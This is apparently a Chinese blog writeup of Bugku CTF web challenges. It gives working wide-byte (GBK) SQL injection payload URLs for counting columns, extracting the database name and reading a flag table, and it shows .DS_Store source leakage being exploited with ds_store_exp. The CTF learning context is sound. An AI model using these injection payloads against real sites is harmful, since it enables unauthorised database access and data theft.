您的位置:首页 > 其它

bugku writeup web

2017-10-27 19:45 706 查看

sql注入

先可以通过burp来发现是gbk编码,可以得知可能存在宽字节注入

既然有提示,那么就按照提示来

查询key表,id=1的string字段

构造payload

http://103.238.227.13:10083/?id=1%df%27 union select 1,string from sql5.key%23


得到flag~~~~

有趣的是

http://103.238.227.13:10083/?id=1%df%27 union select 1,string from key where table_schema=database()%23

http://103.238.227.13:10083/?id=1%df%27 union select 1,string from key where table_schema=database() and table_name=key%23

这俩居然是爆不出来的= =

表非得是sql5.key,直接 from key是爆不出来的,所以得先爆出库名

http://103.238.227.13:10083/?id=1%df%27 union select 1,database()%23


在此之前得先知道有几列

http://103.238.227.13:10083/?id=1%df%27 order by 2%23


由此得出有两列hhh

**

sql注入2

**

这题有点迷。。。。一上来就是登陆框,尝试各种注入,无果。

参考了大牛们的博客,才晓得是源码泄露

先了解些概念:

.DS_Store文件泄漏
漏洞成因:
在发布代码时未删除文件夹中隐藏的.DS_store,被发现后,获取了敏感的文件名等信息。
漏洞利用: http://www.example.com/.ds_store 注意路径检查
工具:
dsstoreexp
python ds_store_exp.pyhttp://www.example.com/.DS_Store


所以,直接cmd



直接打开web2目录下的flag即可,得到flag~~~
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: